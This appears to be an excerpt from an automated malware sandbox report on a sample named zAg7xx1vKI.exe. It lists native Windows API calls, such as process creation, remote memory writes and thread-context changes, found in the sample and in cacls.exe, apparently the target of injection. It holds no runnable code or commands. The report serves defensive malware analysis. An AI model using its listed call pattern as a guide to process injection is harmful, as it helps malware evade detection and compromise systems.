Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2B80 NtQueryInformationFile,	3_2_010C2B80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2BA0 NtEnumerateValueKey,	3_2_010C2BA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2BE0 NtQueryValueKey,	3_2_010C2BE0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2BF0 NtAllocateVirtualMemory,	3_2_010C2BF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2AB0 NtWaitForSingleObject,	3_2_010C2AB0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2AD0 NtReadFile,	3_2_010C2AD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2AF0 NtWriteFile,	3_2_010C2AF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2D00 NtSetInformationFile,	3_2_010C2D00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2D10 NtMapViewOfSection,	3_2_010C2D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2D30 NtUnmapViewOfSection,	3_2_010C2D30
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2DB0 NtEnumerateKey,	3_2_010C2DB0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2DD0 NtDelayExecution,	3_2_010C2DD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2C00 NtQueryInformationProcess,	3_2_010C2C00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2C60 NtCreateKey,	3_2_010C2C60
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2CA0 NtQueryInformationToken,	3_2_010C2CA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2CC0 NtQueryVirtualMemory,	3_2_010C2CC0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2CF0 NtOpenProcess,	3_2_010C2CF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2F30 NtCreateSection,	3_2_010C2F30
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2F60 NtCreateProcessEx,	3_2_010C2F60
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2F90 NtProtectVirtualMemory,	3_2_010C2F90
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2FA0 NtQuerySection,	3_2_010C2FA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2FB0 NtResumeThread,	3_2_010C2FB0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2FE0 NtCreateFile,	3_2_010C2FE0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2E30 NtWriteVirtualMemory,	3_2_010C2E30
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2E80 NtReadVirtualMemory,	3_2_010C2E80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2EA0 NtAdjustPrivilegesToken,	3_2_010C2EA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2EE0 NtQueueApcThread,	3_2_010C2EE0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C3010 NtOpenDirectoryObject,	3_2_010C3010
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C3090 NtSetValueKey,	3_2_010C3090
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C39B0 NtGetContextThread,	3_2_010C39B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C3D10 NtOpenProcessToken,	3_2_010C3D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C3D70 NtOpenThread,	3_2_010C3D70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F84340 NtSetContextThread,LdrInitializeThunk,	6_2_02F84340
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F84650 NtSuspendThread,LdrInitializeThunk,	6_2_02F84650
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82AF0 NtWriteFile,LdrInitializeThunk,	6_2_02F82AF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82AD0 NtReadFile,LdrInitializeThunk,	6_2_02F82AD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_02F82BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_02F82BE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_02F82BA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82B60 NtClose,LdrInitializeThunk,	6_2_02F82B60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_02F82EE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_02F82E80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82FE0 NtCreateFile,LdrInitializeThunk,	6_2_02F82FE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82FB0 NtResumeThread,LdrInitializeThunk,	6_2_02F82FB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82F30 NtCreateSection,LdrInitializeThunk,	6_2_02F82F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_02F82CA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_02F82C70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82C60 NtCreateKey,LdrInitializeThunk,	6_2_02F82C60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_02F82DF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82DD0 NtDelayExecution,LdrInitializeThunk,	6_2_02F82DD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_02F82D30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_02F82D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F835C0 NtCreateMutant,LdrInitializeThunk,	6_2_02F835C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F839B0 NtGetContextThread,LdrInitializeThunk,	6_2_02F839B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82AB0 NtWaitForSingleObject,	6_2_02F82AB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82B80 NtQueryInformationFile,	6_2_02F82B80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82EA0 NtAdjustPrivilegesToken,	6_2_02F82EA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82E30 NtWriteVirtualMemory,	6_2_02F82E30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82FA0 NtQuerySection,	6_2_02F82FA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82F90 NtProtectVirtualMemory,	6_2_02F82F90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82F60 NtCreateProcessEx,	6_2_02F82F60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82CF0 NtOpenProcess,	6_2_02F82CF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82CC0 NtQueryVirtualMemory,	6_2_02F82CC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82C00 NtQueryInformationProcess,	6_2_02F82C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82DB0 NtEnumerateKey,	6_2_02F82DB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F82D00 NtSetInformationFile,	6_2_02F82D00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F83090 NtSetValueKey,	6_2_02F83090
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F83010 NtOpenDirectoryObject,	6_2_02F83010
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F83D70 NtOpenThread,	6_2_02F83D70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F83D10 NtOpenProcessToken,	6_2_02F83D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00649560 NtCreateFile,	6_2_00649560
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_006496D0 NtReadFile,	6_2_006496D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_006497D0 NtDeleteFile,	6_2_006497D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00649870 NtClose,	6_2_00649870
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_006499D0 NtAllocateVirtualMemory,	6_2_006499D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAF8BA NtUnmapViewOfSection,	6_2_02DAF8BA
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAF813 NtMapViewOfSection,	6_2_02DAF813

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_00E6D584	0_2_00E6D584
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1B548	0_2_06F1B548
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1D1C0	0_2_06F1D1C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1B110	0_2_06F1B110
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1CD88	0_2_06F1CD88
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1CD78	0_2_06F1CD78
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1C950	0_2_06F1C950
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00418CB3	3_2_00418CB3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040E81C	3_2_0040E81C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00403330	3_2_00403330
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_004013E0	3_2_004013E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0042F473	3_2_0042F473
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_004024FF	3_2_004024FF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00410483	3_2_00410483
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00402500	3_2_00402500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040E683	3_2_0040E683
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_004106A3	3_2_004106A3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00416EB3	3_2_00416EB3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00402704	3_2_00402704
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040270F	3_2_0040270F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00402710	3_2_00402710
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040E7CA	3_2_0040E7CA
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040E7D3	3_2_0040E7D3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080100	3_2_01080100
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112A118	3_2_0112A118
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01118158	3_2_01118158
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011501AA	3_2_011501AA
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011481CC	3_2_011481CC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01122000	3_2_01122000
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114A352	3_2_0114A352
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011503E6	3_2_011503E6
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E3F0	3_2_0109E3F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011102C0	3_2_011102C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01150591	3_2_01150591
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01134420	3_2_01134420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01142446	3_2_01142446
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113E4F6	3_2_0113E4F6
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B4750	3_2_010B4750
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108C7C0	3_2_0108C7C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AC6E0	3_2_010AC6E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A6962	3_2_010A6962
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0115A9A6	3_2_0115A9A6
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109A840	3_2_0109A840
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010768B8	3_2_010768B8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE8F0	3_2_010BE8F0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01146BD7	3_2_01146BD7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109AD00	3_2_0109AD00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112CD1F	3_2_0112CD1F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A8DBF	3_2_010A8DBF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108ADE0	3_2_0108ADE0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090C00	3_2_01090C00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130CB5	3_2_01130CB5
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080CF2	3_2_01080CF2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01132F30	3_2_01132F30
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D2F28	3_2_010D2F28
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B0F30	3_2_010B0F30
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01104F40	3_2_01104F40
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110EFA0	3_2_0110EFA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01082FC8	3_2_01082FC8
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109CFE0	3_2_0109CFE0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114EE26	3_2_0114EE26
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090E59	3_2_01090E59
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114CE93	3_2_0114CE93
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2E90	3_2_010A2E90
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114EEDB	3_2_0114EEDB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C516C	3_2_010C516C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107F172	3_2_0107F172
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0115B16B	3_2_0115B16B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109B1B0	3_2_0109B1B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010970C0	3_2_010970C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113F0CC	3_2_0113F0CC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114F0E0	3_2_0114F0E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011470E9	3_2_011470E9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114132D	3_2_0114132D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107D34C	3_2_0107D34C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D739A	3_2_010D739A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010952A0	3_2_010952A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AB2C0	3_2_010AB2C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011312ED	3_2_011312ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01147571	3_2_01147571
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112D5B0	3_2_0112D5B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114F43F	3_2_0114F43F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01081460	3_2_01081460
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114F7B0	3_2_0114F7B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010817EC	3_2_010817EC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011416CC	3_2_011416CC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01125910	3_2_01125910
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01099950	3_2_01099950
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AB950	3_2_010AB950
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FD800	3_2_010FD800
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010938E0	3_2_010938E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114FB76	3_2_0114FB76
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AFB80	3_2_010AFB80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01105BF0	3_2_01105BF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010CDBF9	3_2_010CDBF9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01147A46	3_2_01147A46
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114FA49	3_2_0114FA49
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01103A6C	3_2_01103A6C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D5AA0	3_2_010D5AA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01131AA3	3_2_01131AA3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112DAAC	3_2_0112DAAC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113DAC6	3_2_0113DAC6
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01093D40	3_2_01093D40
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01141D5A	3_2_01141D5A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01147D73	3_2_01147D73
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AFDC0	3_2_010AFDC0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01109C32	3_2_01109C32
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114FF09	3_2_0114FF09
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01091F92	3_2_01091F92
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114FFB1	3_2_0114FFB1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01099EB0	3_2_01099EB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FD02C0	6_2_02FD02C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300A352	6_2_0300A352
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF0274	6_2_02FF0274
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030103E6	6_2_030103E6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F5E3F0	6_2_02F5E3F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030041A2	6_2_030041A2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030101AA	6_2_030101AA
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030081CC	6_2_030081CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FE2000	6_2_02FE2000
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FD8158	6_2_02FD8158
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FEA118	6_2_02FEA118
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F40100	6_2_02F40100
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F6C6E0	6_2_02F6C6E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F4C7C0	6_2_02F4C7C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F50770	6_2_02F50770
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F74750	6_2_02F74750
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FFE4F6	6_2_02FFE4F6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03010591	6_2_03010591
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF4420	6_2_02FF4420
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03002446	6_2_03002446
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F50535	6_2_02F50535
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300AB40	6_2_0300AB40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F4EA80	6_2_02F4EA80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03006BD7	6_2_03006BD7
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F7E8F0	6_2_02F7E8F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F368B8	6_2_02F368B8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0301A9A6	6_2_0301A9A6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F5A840	6_2_02F5A840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F52840	6_2_02F52840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F529A0	6_2_02F529A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F66962	6_2_02F66962
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F62E90	6_2_02F62E90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F50E59	6_2_02F50E59
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F5CFE0	6_2_02F5CFE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300EE26	6_2_0300EE26
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F42FC8	6_2_02F42FC8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FCEFA0	6_2_02FCEFA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300CE93	6_2_0300CE93
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FC4F40	6_2_02FC4F40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F70F30	6_2_02F70F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF2F30	6_2_02FF2F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F92F28	6_2_02F92F28
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300EEDB	6_2_0300EEDB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F40CF2	6_2_02F40CF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF0CB5	6_2_02FF0CB5
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F50C00	6_2_02F50C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F4ADE0	6_2_02F4ADE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F68DBF	6_2_02F68DBF
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FECD1F	6_2_02FECD1F
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F5AD00	6_2_02F5AD00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF12ED	6_2_02FF12ED
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300132D	6_2_0300132D
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F6B2C0	6_2_02F6B2C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F552A0	6_2_02F552A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F9739A	6_2_02F9739A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F3D34C	6_2_02F3D34C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FFF0CC	6_2_02FFF0CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F570C0	6_2_02F570C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0301B16B	6_2_0301B16B
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F5B1B0	6_2_02F5B1B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F3F172	6_2_02F3F172
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F8516C	6_2_02F8516C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300F0E0	6_2_0300F0E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030070E9	6_2_030070E9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300F7B0	6_2_0300F7B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F95630	6_2_02F95630
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F417EC	6_2_02F417EC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030016CC	6_2_030016CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03007571	6_2_03007571
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F41460	6_2_02F41460
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_030195C3	6_2_030195C3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300F43F	6_2_0300F43F
